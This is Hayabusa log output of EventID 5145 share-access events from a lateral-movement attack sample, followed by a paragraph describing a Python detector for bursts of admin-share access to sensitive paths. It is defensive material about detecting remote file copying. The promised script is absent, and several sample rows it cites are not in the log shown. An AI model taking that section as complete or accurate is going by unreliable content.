2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 
23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
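The 5145 rows above are individually rated "info" by Hayabusa, but taken together they show one logon (LID 0xfc635) from 10.0.2.15 walking every profile directory under C$ in well under a second, including Users\IEUser\.ssh and a Startup folder. The script below is an added example, not Hayabusa's own code or rule logic: it parses Hayabusa CSV rows into their Details fields, groups admin-share (share name ending in $) accesses by computer, logon ID, source IP and share, and flags any group that touches at least a threshold of distinct paths inside a one-second sliding window, listing paths that match a small sensitive-location list. The embedded CSV is a constructed ten-row subset of the rows on this page, cut down to the four columns the script reads; the threshold, window and sensitive-fragment list are assumptions to tune per environment.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: ten of the Hayabusa EventID 5145 rows from this page,
# cut down to the four columns this script uses. Not a complete Hayabusa CSV.
SAMPLE_CSV = r"""Timestamp,Computer,EventID,Details
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635
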